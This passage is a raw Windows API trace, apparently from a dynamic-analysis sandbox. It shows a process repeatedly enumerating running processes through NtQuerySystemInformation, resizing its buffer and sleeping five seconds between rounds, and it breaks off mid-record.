[0246.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.848] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.859] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.869] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.880] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.891] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.902] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.911] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.920] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.928] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.938] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.947] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.957] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.967] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.979] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.986] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.992] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.000] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.006] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.014] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.021] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, 